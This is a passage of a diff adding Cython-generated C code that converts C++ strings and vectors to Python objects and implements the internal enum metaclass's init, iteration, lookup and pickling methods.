PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyByteArray_string_to_py_std__in_string", 0); + + /* "string.to_py":56 + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyByteArray_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyByteArray_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "vector.to_py":66 + * + * @cname("__pyx_convert_vector_to_py_std_3a__3a_string") + * cdef object __pyx_convert_vector_to_py_std_3a__3a_string(const vector[X]& v): # <<<<<<<<<<<<<< + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() + */ + +static PyObject *__pyx_convert_vector_to_py_std_3a__3a_string(std::vector const &__pyx_v_v) { + Py_ssize_t __pyx_v_v_size_signed; + PyObject *__pyx_v_o = NULL; + Py_ssize_t __pyx_v_i; + PyObject *__pyx_v_item = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_vector_to_py_std_3a__3a_string", 0); + + /* "vector.to_py":67 + * @cname("__pyx_convert_vector_to_py_std_3a__3a_string") + * cdef object __pyx_convert_vector_to_py_std_3a__3a_string(const vector[X]& v): + * if v.size() > PY_SSIZE_T_MAX: # <<<<<<<<<<<<<< + * raise MemoryError() + * v_size_signed = v.size() + */ + __pyx_t_1 = (__pyx_v_v.size() > ((size_t)PY_SSIZE_T_MAX)); + if (unlikely(__pyx_t_1)) { + + /* "vector.to_py":68 + * cdef object __pyx_convert_vector_to_py_std_3a__3a_string(const vector[X]& v): + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() # <<<<<<<<<<<<<< + * v_size_signed = v.size() + * + */ + PyErr_NoMemory(); __PYX_ERR(1, 68, __pyx_L1_error) + + /* "vector.to_py":67 + * @cname("__pyx_convert_vector_to_py_std_3a__3a_string") + * cdef object __pyx_convert_vector_to_py_std_3a__3a_string(const vector[X]& v): + * if v.size() > PY_SSIZE_T_MAX: # <<<<<<<<<<<<<< + * raise MemoryError() + * v_size_signed = v.size() + */ + } + + /* "vector.to_py":69 + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() + * v_size_signed = v.size() # <<<<<<<<<<<<<< + * + * o = PyList_New(v_size_signed) + */ + __pyx_v_v_size_signed = ((Py_ssize_t)__pyx_v_v.size()); + + /* "vector.to_py":71 + * v_size_signed = v.size() + * + * o = PyList_New(v_size_signed) # <<<<<<<<<<<<<< + * + * cdef Py_ssize_t i + */ + __pyx_t_2 = PyList_New(__pyx_v_v_size_signed); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 71, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_v_o = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "vector.to_py":76 + * cdef object item + * + * for i in range(v_size_signed): # <<<<<<<<<<<<<< + * item = v[i] + * Py_INCREF(item) + */ + __pyx_t_3 = __pyx_v_v_size_signed; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "vector.to_py":77 + * + * for i in range(v_size_signed): + * item = v[i] # <<<<<<<<<<<<<< + * Py_INCREF(item) + * PyList_SET_ITEM(o, i, item) + */ + __pyx_t_2 = __pyx_convert_PyBytes_string_to_py_std__in_string((__pyx_v_v[__pyx_v_i])); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 77, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_2); + __pyx_t_2 = 0; + + /* "vector.to_py":78 + * for i in range(v_size_signed): + * item = v[i] + * Py_INCREF(item) # <<<<<<<<<<<<<< + * PyList_SET_ITEM(o, i, item) + * + */ + Py_INCREF(__pyx_v_item); + + /* "vector.to_py":79 + * item = v[i] + * Py_INCREF(item) + * PyList_SET_ITEM(o, i, item) # <<<<<<<<<<<<<< + * + * return o + */ + PyList_SET_ITEM(__pyx_v_o, __pyx_v_i, __pyx_v_item); + } + + /* "vector.to_py":81 + * PyList_SET_ITEM(o, i, item) + * + * return o # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_o); + __pyx_r = __pyx_v_o; + goto __pyx_L0; + + /* "vector.to_py":66 + * + * @cname("__pyx_convert_vector_to_py_std_3a__3a_string") + * cdef object __pyx_convert_vector_to_py_std_3a__3a_string(const vector[X]& v): # <<<<<<<<<<<<<< + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("vector.to_py.__pyx_convert_vector_to_py_std_3a__3a_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_o); + __Pyx_XDECREF(__pyx_v_item); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":17 + * @cython.internal + * cdef class __Pyx_EnumMeta(type): + * def __init__(cls, name, parents, dct): # <<<<<<<<<<<<<< + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + */ + +/* Python wrapper */ +static int __pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__(PyObject *__pyx_v_cls, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__(PyObject *__pyx_v_cls, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_name = 0; + PyObject *__pyx_v_parents = 0; + PyObject *__pyx_v_dct = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,&__pyx_n_s_parents,&__pyx_n_s_dct,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_parents)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 1, 3, 3, 1); __PYX_ERR(1, 17, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dct)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 1, 3, 3, 2); __PYX_ERR(1, 17, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(1, 17, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + } + __pyx_v_name = values[0]; + __pyx_v_parents = values[1]; + __pyx_v_dct = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 17, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta___init__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_cls), __pyx_v_name, __pyx_v_parents, __pyx_v_dct); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_8EnumBase_14__Pyx_EnumMeta___init__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name, PyObject *__pyx_v_parents, PyObject *__pyx_v_dct) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + + /* "EnumBase":18 + * cdef class __Pyx_EnumMeta(type): + * def __init__(cls, name, parents, dct): + * type.__init__(cls, name, parents, dct) # <<<<<<<<<<<<<< + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)(&PyType_Type)), __pyx_n_s_init); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 18, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[5] = {__pyx_t_3, ((PyObject *)__pyx_v_cls), __pyx_v_name, __pyx_v_parents, __pyx_v_dct}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 18, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":19 + * def __init__(cls, name, parents, dct): + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() # <<<<<<<<<<<<<< + * def __iter__(cls): + * return iter(cls.__members__.values()) + */ + __Pyx_INCREF(__Pyx_OrderedDict); + __pyx_t_2 = __Pyx_OrderedDict; __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_3, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 19, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + if (__Pyx_PyObject_SetAttrStr(((PyObject *)__pyx_v_cls), __pyx_n_s_members, __pyx_t_1) < 0) __PYX_ERR(1, 19, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":17 + * @cython.internal + * cdef class __Pyx_EnumMeta(type): + * def __init__(cls, name, parents, dct): # <<<<<<<<<<<<<< + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":20 + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): # <<<<<<<<<<<<<< + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__(PyObject *__pyx_v_cls); /*proto*/ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__(PyObject *__pyx_v_cls) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__iter__ (wrapper)", 0); + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_2__iter__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_cls)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_2__iter__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__iter__", 0); + + /* "EnumBase":21 + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): + * return iter(cls.__members__.values()) # <<<<<<<<<<<<<< + * def __getitem__(cls, name): + * return cls.__members__[name] + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_cls), __pyx_n_s_members); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_values); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_2)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_2, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "EnumBase":20 + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): # <<<<<<<<<<<<<< + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__iter__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":22 + * def __iter__(cls): + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): # <<<<<<<<<<<<<< + * return cls.__members__[name] + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__(PyObject *__pyx_v_cls, PyObject *__pyx_v_name); /*proto*/ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__(PyObject *__pyx_v_cls, PyObject *__pyx_v_name) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_4__getitem__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_cls), ((PyObject *)__pyx_v_name)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_4__getitem__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "EnumBase":23 + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): + * return cls.__members__[name] # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_cls), __pyx_n_s_members); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_name); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "EnumBase":22 + * def __iter__(cls): + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): # <<<<<<<<<<<<<< + * return cls.__members__[name] + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_6__reduce_cython__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_6__reduce_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self) { + PyObject *__pyx_v_state = 0; + PyObject *__pyx_v__dict = 0; + int __pyx_v_use_setstate; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":5 + * cdef object _dict + * cdef bint use_setstate + * state = () # <<<<<<<<<<<<<< + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + */ + __Pyx_INCREF(__pyx_empty_tuple); + __pyx_v_state = __pyx_empty_tuple; + + /* "(tree fragment)":6 + * cdef bint use_setstate + * state = () + * _dict = getattr(self, '__dict__', None) # <<<<<<<<<<<<<< + * if _dict is not None: + * state += (_dict,) + */ + __pyx_t_1 = __Pyx_GetAttr3(((PyObject *)__pyx_v_self), __pyx_n_s_dict, Py_None); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v__dict = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":7 + * state = () + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + __pyx_t_2 = (__pyx_v__dict != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":8 + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + * state += (_dict,) # <<<<<<<<<<<<<< + * use_setstate = True + * else: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v__dict); + __Pyx_GIVEREF(__pyx_v__dict); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v__dict); + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_state, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_state, ((PyObject*)__pyx_t_3)); + __pyx_t_3 = 0; + + /* "(tree fragment)":9 + * if _dict is not None: + * state += (_dict,) + * use_setstate = True # <<<<<<<<<<<<<< + * else: + * use_setstate = False + */ + __pyx_v_use_setstate = 1; + + /* "(tree fragment)":7 + * state = () + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + goto __pyx_L3; + } + + /* "(tree fragment)":11 + * use_setstate = True + * else: + * use_setstate = False # <<<<<<<<<<<<<< + * if use_setstate: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + */ + /*else*/ { + __pyx_v_use_setstate = 0; + } + __pyx_L3:; + + /* "(tree fragment)":12 + * else: + * use_setstate = False + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + * else: + */ + if (__pyx_v_use_setstate) { + + /* "(tree fragment)":13 + * use_setstate = False + * if use_setstate: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state # <<<<<<<<<<<<<< + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_238750788); + __Pyx_GIVEREF(__pyx_int_238750788); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_238750788); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_1, 2, Py_None); + __pyx_t_4 = PyTuple_New(3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_state); + __pyx_t_3 = 0; + __pyx_t_1 = 